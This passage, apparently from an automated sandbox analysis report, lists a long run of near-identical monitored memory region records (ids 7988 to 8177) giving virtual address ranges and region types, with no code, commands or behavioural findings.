7988 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7989 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7990 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7991 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7992 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7993 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7994 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7995 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7996 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7997 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7998 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7999 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8000 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8001 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8002 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8003 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8004 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8005 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8006 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8007 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8008 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8009 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8010 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8011 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8012 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8013 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8014 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8015 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8016 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8017 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8018 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8019 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8020 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8021 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8022 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8023 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8024 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8025 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8026 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8027 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 8028 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 8029 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8030 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8031 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8032 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8033 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8034 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8035 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8036 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8037 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8038 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8039 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8040 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8041 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8042 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8043 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8044 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8045 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8046 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8047 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8048 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 8049 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 8050 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8051 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8052 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8053 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8054 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8055 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8056 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8057 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8058 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8059 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8060 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8061 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8062 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8063 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8064 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8065 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8066 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8067 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8068 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8069 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 8070 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 8071 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8072 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8073 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 8074 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 8075 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8076 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8077 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8078 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8079 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8080 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8081 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8082 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8083 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8084 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8085 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8086 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8087 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8088 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8089 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8090 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8091 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8092 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8093 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8094 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8095 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8096 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8097 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8098 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8099 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8100 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8101 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8102 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8103 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8104 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8105 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8106 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8107 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8108 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8109 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8110 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8111 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8112 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8113 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8114 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8115 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8116 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8117 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8118 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8119 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8120 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8121 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8122 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8123 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 8124 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 8125 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8126 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8127 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8128 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8129 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8130 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8131 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8132 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8133 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8134 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8135 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8136 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8137 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8138 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8139 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8140 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8141 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8142 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8143 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8144 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8145 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8146 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8147 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8148 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8149 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8150 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8151 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8152 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8153 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8154 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8155 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8156 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8157 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8158 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8159 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8160 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8161 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8162 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8163 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8164 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8165 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8166 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8167 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8168 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8169 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8170 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8171 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8172 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8173 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8174 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8175 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8176 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8177 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" 